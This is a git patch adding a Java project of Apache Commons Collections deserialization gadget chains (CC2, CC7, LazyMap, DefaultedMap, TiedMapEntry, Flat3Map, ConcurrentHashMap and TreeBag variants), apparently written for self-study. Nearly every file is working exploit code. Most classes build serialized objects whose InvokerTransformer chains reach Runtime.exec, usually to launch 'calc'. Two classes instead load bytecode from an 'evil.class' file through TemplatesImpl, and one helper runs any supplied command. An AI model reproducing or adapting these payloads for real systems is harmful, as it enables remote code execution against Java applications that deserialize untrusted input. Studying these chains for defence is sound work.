From 966037f763310f811511e0720bfd5e171104a3fe Mon Sep 17 00:00:00 2001 From: hookdd <2508091109@qq.com> Date: Wed, 16 Oct 2024 12:52:34 +0800 Subject: [PATCH] =?UTF-8?q?=E7=AC=AC=E4=B8=80=E6=AC=A1=E6=B5=8B=E8=AF=95?= =?UTF-8?q?=E6=8F=90=E4=BA=A4?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- pom.xml | 56 ++++++++++++++ src/main/java/cc/CC2.java | 43 +++++++++++ src/main/java/cc/CC7.java | 57 ++++++++++++++ .../java/cc/ConcurrentHashMap_equals.java | 49 ++++++++++++ src/main/java/cc/DefaultedMapcc.java | 65 ++++++++++++++++ src/main/java/cc/Flat3Map_equals.java | 32 ++++++++ src/main/java/cc/HashMap_toString.java | 42 +++++++++++ src/main/java/cc/LazyMapcc.java | 75 +++++++++++++++++++ src/main/java/cc/SerializableTest.java | 21 ++++++ src/main/java/cc/TiedMapEntry_equals.java | 70 +++++++++++++++++ src/main/java/cc/TiedMapEntry_hashCode.java | 63 ++++++++++++++++ src/main/java/cc/TreeBag_compare.java | 35 +++++++++ 12 files changed, 608 insertions(+) create mode 100644 pom.xml create mode 100644 src/main/java/cc/CC2.java create mode 100644 src/main/java/cc/CC7.java create mode 100644 src/main/java/cc/ConcurrentHashMap_equals.java create mode 100644 src/main/java/cc/DefaultedMapcc.java create mode 100644 src/main/java/cc/Flat3Map_equals.java create mode 100644 src/main/java/cc/HashMap_toString.java create mode 100644 src/main/java/cc/LazyMapcc.java create mode 100644 src/main/java/cc/SerializableTest.java create mode 100644 src/main/java/cc/TiedMapEntry_equals.java create mode 100644 src/main/java/cc/TiedMapEntry_hashCode.java create mode 100644 src/main/java/cc/TreeBag_compare.java diff --git a/pom.xml b/pom.xml new file mode 100644 index 0000000..c5ce4ce --- /dev/null +++ b/pom.xml @@ -0,0 +1,56 @@ + + 4.0.0 + org.example + newCC + war + 1.0-SNAPSHOT + newCC Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + commons-collections + commons-collections + 3.1 + + + commons-collections + commons-collections + 3.2.1 + + + org.apache.commons + commons-collections4 + 4.4 + + + org.javassist + javassist + 3.19.0-GA + + + concurrent + concurrent + 1.3.4 + + + + newCC + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + + + diff --git a/src/main/java/cc/CC2.java b/src/main/java/cc/CC2.java new file mode 100644 index 0000000..2eaa0e3 --- /dev/null +++ b/src/main/java/cc/CC2.java @@ -0,0 +1,43 @@ +package cc; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections4.comparators.TransformingComparator; +import org.apache.commons.collections4.functors.ConstantTransformer; + +import java.lang.reflect.Field; +import java.nio.file.Files; +import java.nio.file.Paths; +import java.util.Base64; +import java.util.PriorityQueue; + +public class CC2 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + Class templatesClass = templates.getClass(); + Field fieldname = templatesClass.getDeclaredField("_name"); + fieldname.setAccessible(true); + fieldname.set(templates, "aaa"); + Field bytecodesclass = templatesClass.getDeclaredField("_bytecodes"); + bytecodesclass.setAccessible(true); + + byte[] bytes = Files.readAllBytes(Paths.get("E:\\seecode\\FristTest\\target\\classes\\CC\\evil.class")); + String encode = Base64.getEncoder().encodeToString(bytes); + byte[] code = Base64.getDecoder().decode(encode); + byte[][] codes = {code}; + bytecodesclass.set(templates, codes); + + InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{}); + TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1)); + + PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator); + priorityQueue.add(templates); + priorityQueue.add(2); + Class transformingComparatorClass = transformingComparator.getClass(); + Field field = transformingComparatorClass.getDeclaredField("transformer"); + field.setAccessible(true); + field.set(transformingComparator, invokerTransformer); + SerializableTest.searilze(priorityQueue, "cc2.bin"); + SerializableTest.unzearilze("cc2.bin"); + } +} diff --git a/src/main/java/cc/CC7.java b/src/main/java/cc/CC7.java new file mode 100644 index 0000000..fa9da90 --- /dev/null +++ b/src/main/java/cc/CC7.java @@ -0,0 +1,57 @@ +package cc; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +public class CC7 { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) + }; + final Transformer transformerChain = new ChainedTransformer(new Transformer[]{}); + Map innerMap1 = new HashMap(); + Map innerMap2 = new HashMap(); + // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject + Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain); + lazyMap1.put("yy", 1); + Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain); + lazyMap2.put("zZ", 1); + Hashtable hashtable = new Hashtable(); + hashtable.put(lazyMap1, 1); + hashtable.put(lazyMap2, 2); + Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers"); + iTransformers.setAccessible(true); + iTransformers.set(transformerChain,transformers); + lazyMap2.remove("yy"); + SerializableTest.searilze(hashtable,"cc7.bin"); + ConcurrentHashMap deserialized = (ConcurrentHashMap) SerializableTest.unzearilze("cc7.bin"); + + // 检查 entrySet + System.out.println("Entry Set: " + deserialized.entrySet()); + + // 检查 size + System.out.println("Size: " + deserialized.size()); + + // 调用 equals 方法 + boolean isEqual = deserialized.equals(hashtable); + System.out.println("Equal: " + isEqual); + } +} diff --git a/src/main/java/cc/ConcurrentHashMap_equals.java b/src/main/java/cc/ConcurrentHashMap_equals.java new file mode 100644 index 0000000..d65732a --- /dev/null +++ b/src/main/java/cc/ConcurrentHashMap_equals.java @@ -0,0 +1,49 @@ +package cc; + + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantFactory; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +public class ConcurrentHashMap_equals { + public static void main(String[] args) throws Exception { + + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) + }; + Transformer transformerChain = new ChainedTransformer(transformers); + Map lazymap1 = LazyMap.decorate(new HashMap(), new ConstantTransformer(1)); + lazymap1.put("yy", 1); + Map lazymap2 = LazyMap.decorate(new HashMap(), new ConstantTransformer(1)); + lazymap2.put("zZ",1); + + ConcurrentHashMap concurrentHashMap = new ConcurrentHashMap(); + SerializableTest.setFieldValue(concurrentHashMap, "sizeCtl", 2); + Class nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, lazymap1, "yy", null)); + Array.set(tbl, 1, nodeCons.newInstance(0, lazymap2, "zZ", null)); + SerializableTest.setFieldValue(concurrentHashMap, "table", tbl); + + + SerializableTest.setFieldValue(lazymap2, "factory", transformerChain); +// SerializableTest.searilze(concurrentHashMap,"ConcurrentHashMap_equals.bin"); + SerializableTest.unzearilze("ConcurrentHashMap_equals.bin"); + } +} diff --git a/src/main/java/cc/DefaultedMapcc.java b/src/main/java/cc/DefaultedMapcc.java new file mode 100644 index 0000000..f87e24c --- /dev/null +++ b/src/main/java/cc/DefaultedMapcc.java @@ -0,0 +1,65 @@ +package cc; +/* +* ObjectInputStream.readObject() + AnnotationInvocationHandler.readObject() + Map(Proxy).entrySet() + AnnotationInvocationHandler.invoke() + DefaultedMap.get() + ChainedTransformer.transform() + ConstantTransformer.transform() + InvokerTransformer.transform() + Method.invoke() + Class.getMethod() + InvokerTransformer.transform() + Method.invoke() + Runtime.getRuntime() + InvokerTransformer.transform() + Method.invoke() + Runtime.exec() +* */ + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantFactory; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.DefaultedMap; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.annotation.Target; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.Map; + +public class DefaultedMapcc { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), + new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), + new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}) + }; + ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); + + HashMap hashMap = new HashMap(); + + Map Defaultedmap = DefaultedMap.decorate(hashMap, new ConstantFactory(1)); + Field value = DefaultedMap.class.getDeclaredField("value"); + value.setAccessible(true); + value.set(Defaultedmap,chainedTransformer); + + + Class aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor constructor = aClass.getDeclaredConstructor(Class.class, Map.class); + constructor.setAccessible(true); + InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class,Defaultedmap); + Map proxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, invocationHandler); + Object o = constructor.newInstance(Override.class, proxy); + SerializableTest.searilze(o,"Defaultedmap.bin"); + SerializableTest.unzearilze("Defaultedmap.bin"); + } +} diff --git a/src/main/java/cc/Flat3Map_equals.java b/src/main/java/cc/Flat3Map_equals.java new file mode 100644 index 0000000..b6633a6 --- /dev/null +++ b/src/main/java/cc/Flat3Map_equals.java @@ -0,0 +1,32 @@ +package cc; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.Flat3Map; +import org.apache.commons.collections.map.LazyMap; + +import java.util.HashMap; +import java.util.Map; + +public class Flat3Map_equals { + public static void main(String[] args) throws Exception { + Flat3Map flat3Map = new Flat3Map(); + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"www"}) + }; + ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); + Map lazymap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1)); + TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "abc"); + flat3Map.put(tiedMapEntry, 1); + lazymap.remove("abc"); + SerializableTest.setFieldValue(lazymap, "factory", chainedTransformer); + SerializableTest.searilze(flat3Map,"Flat3Map_equals.bin"); + SerializableTest.unzearilze("Flat3Map_equals.bin"); + } +} diff --git a/src/main/java/cc/HashMap_toString.java b/src/main/java/cc/HashMap_toString.java new file mode 100644 index 0000000..523ede8 --- /dev/null +++ b/src/main/java/cc/HashMap_toString.java @@ -0,0 +1,42 @@ +package cc; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantFactory; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.lang.annotation.Target; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + +public class HashMap_toString { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) + }; + Transformer transformerChain = new ChainedTransformer(transformers); + Map decorate = LazyMap.decorate(new HashMap(), new ConstantFactory(1)); + + TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate,1); + HashMap map = new HashMap(); + map.put("value",tiedMapEntry); + + Class AnnotationInvocationHandler = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor Anotationdeclared = AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class); + Anotationdeclared.setAccessible(true); + InvocationHandler h = (InvocationHandler) Anotationdeclared.newInstance(Target.class, map); + + SerializableTest.setFieldValue(decorate, "factory",transformerChain ); + SerializableTest.setFieldValue(tiedMapEntry, "key",233); + SerializableTest.searilze(h,"HashMap_equals.bin"); + SerializableTest.unzearilze("HashMap_equals.bin"); + } +} diff --git a/src/main/java/cc/LazyMapcc.java b/src/main/java/cc/LazyMapcc.java new file mode 100644 index 0000000..cc0e6a7 --- /dev/null +++ b/src/main/java/cc/LazyMapcc.java @@ -0,0 +1,75 @@ +package cc; +/* + Gadget chain: + ObjectInputStream.readObject() + AnnotationInvocationHandler.readObject() + Map(Proxy).entrySet() + AnnotationInvocationHandler.invoke() + LazyMap.get() + ChainedTransformer.transform() + ConstantTransformer.transform() + InvokerTransformer.transform() + Method.invoke() + Class.getMethod() + InvokerTransformer.transform() + Method.invoke() + Runtime.getRuntime() + InvokerTransformer.transform() + Method.invoke() + Runtime.exec() + + Requires: + commons-collections + */ +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; + +import java.lang.annotation.Target; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.Map; +import java.util.Scanner; + +public class LazyMapcc { + public static void evilcmd(String cmd){ + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), + new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), + new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd}) + }; + ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); + chainedTransformer.transform(Runtime.class); + } + public static void main(String[] args) throws Exception { +// Scanner scanner = new Scanner(System.in); +// System.out.println("cmd:"+ scanner); +// String cmd =scanner.nextLine(); +// evilcmd(cmd); + + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), + new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), + new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}) + }; + ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); +// chainedTransformer.transform(Runtime.class); + + HashMap hashMap = new HashMap(); + Map lazymap = LazyMap.decorate(hashMap, chainedTransformer); + Class aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor constructor = aClass.getDeclaredConstructor(Class.class, Map.class); + constructor.setAccessible(true); + InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class,lazymap); + Map proxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, invocationHandler); + Object o = constructor.newInstance(Override.class, proxy); + SerializableTest.searilze(o,"LazyMapcc.bin"); + SerializableTest.unzearilze("LazyMapcc.bin"); + } +} diff --git a/src/main/java/cc/SerializableTest.java b/src/main/java/cc/SerializableTest.java new file mode 100644 index 0000000..93e1b30 --- /dev/null +++ b/src/main/java/cc/SerializableTest.java @@ -0,0 +1,21 @@ +package cc; + +import java.io.*; +import java.lang.reflect.Field; + +public class SerializableTest { + public static void searilze(Object obj,String filename) throws IOException { + ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(filename)); + oos.writeObject(obj); + } + public static Object unzearilze(String filename) throws IOException, ClassNotFoundException { + ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename)); + Object readObject = ois.readObject(); + return readObject; + } + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj,value); + } +} diff --git a/src/main/java/cc/TiedMapEntry_equals.java b/src/main/java/cc/TiedMapEntry_equals.java new file mode 100644 index 0000000..8ab7b5c --- /dev/null +++ b/src/main/java/cc/TiedMapEntry_equals.java @@ -0,0 +1,70 @@ +package cc; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; +/* + Gadget chain: + ObjectInputStream.readObject() + java.util.Hashtable.readObject() + java.util.Hashtable.reconstitutionPut() + TiedMapEntry.equals(); + TiedMapEntry.getValue() + + .get() + ChainedTransformer.transform() + ConstantTransformer.transform() + InvokerTransformer.transform() + Method.invoke() + Class.getMethod() + InvokerTransformer.transform() + Method.invoke() + Runtime.getRuntime() + InvokerTransformer.transform() + Method.invoke() + Runtime.exec() + Requires: + commons-collections + */ +public class TiedMapEntry_equals { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"aaa"}) + }; + final Transformer transformerChain = new ChainedTransformer(new Transformer[]{}); + Map lazyMap1 = LazyMap.decorate(new HashMap(), transformerChain); + Map lazyMap2 = LazyMap.decorate(new HashMap(), transformerChain); + + TiedMapEntry tiedMapEntry1 = new TiedMapEntry(lazyMap1,transformers); + TiedMapEntry tiedMapEntry2 = new TiedMapEntry(lazyMap2,transformers); + + Hashtable hashtable = new Hashtable(); + SerializableTest.setFieldValue(hashtable,"count",2); + + Class nodeC = Class.forName("java.util.Hashtable$Entry"); + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, tiedMapEntry1, "aaa", null)); + Array.set(tbl, 1, nodeCons.newInstance(0, tiedMapEntry2, "bbb", null)); + SerializableTest.setFieldValue(hashtable, "table", tbl); + + SerializableTest.setFieldValue(transformerChain,"iTransformers",transformers); + + SerializableTest.searilze(hashtable,"TiedMapEntry_equals.bin"); + SerializableTest.unzearilze("TiedMapEntry_equals.bin"); + } +} diff --git a/src/main/java/cc/TiedMapEntry_hashCode.java b/src/main/java/cc/TiedMapEntry_hashCode.java new file mode 100644 index 0000000..5fdabc5 --- /dev/null +++ b/src/main/java/cc/TiedMapEntry_hashCode.java @@ -0,0 +1,63 @@ +package cc; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; +/* + Gadget chain: + ObjectInputStream.readObject() + java.util.Hashtable.readObject() + java.util.Hashtable.reconstitutionPut() + TiedMapEntry.hashCode(); + TiedMapEntry.getValue() + LazyMap.get() + ChainedTransformer.transform() + ConstantTransformer.transform() + InvokerTransformer.transform() + Method.invoke() + Class.getMethod() + InvokerTransformer.transform() + Method.invoke() + Runtime.getRuntime() + InvokerTransformer.transform() + Method.invoke() + Runtime.exec() + Requires: + commons-collections + */ + +public class TiedMapEntry_hashCode { + public static void main(String[] args) throws Exception { + + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) + }; + final Transformer transformerChain = new ChainedTransformer(new Transformer[]{}); + + Map lazymap = LazyMap.decorate(new HashMap(), transformerChain); + TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "123"); + Hashtable hashtable = new Hashtable(); + hashtable.put(tiedMapEntry,"123"); + + Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers"); + iTransformers.setAccessible(true); + iTransformers.set(transformerChain,transformers); + lazymap.remove("123"); + + SerializableTest.searilze(hashtable,"TiedMapEntry_equals.bin"); + SerializableTest.unzearilze("TiedMapEntry_equals.bin"); + } +} diff --git a/src/main/java/cc/TreeBag_compare.java b/src/main/java/cc/TreeBag_compare.java new file mode 100644 index 0000000..171bced --- /dev/null +++ b/src/main/java/cc/TreeBag_compare.java @@ -0,0 +1,35 @@ +package cc; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.bag.TreeBag; +import org.apache.commons.collections4.comparators.TransformingComparator; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; + +import java.nio.file.Files; +import java.nio.file.Paths; +import java.util.Base64; +import java.util.TreeMap; + +public class TreeBag_compare { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + SerializableTest.setFieldValue(templates,"_name","aaa"); + byte[] bytes = Files.readAllBytes(Paths.get("D:\\idea\\CC\\target\\classes\\CC\\CC3Test.class")); + String encode = Base64.getEncoder().encodeToString(bytes); + byte[] code = Base64.getDecoder().decode(encode); + byte[][] codes = {code}; + SerializableTest.setFieldValue(templates,"_bytecodes",codes); + InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{}); + TransformingComparator transformingComparator = new TransformingComparator<>( new ConstantTransformer(1)); + + TreeBag treeBag = new TreeBag(); + + SerializableTest.setFieldValue(transformingComparator,"transformer",invokerTransformer); + SerializableTest.searilze(treeBag,"TreeBag_compare.bin"); + SerializableTest.unzearilze("TreeBag_compare.bin"); + + } +}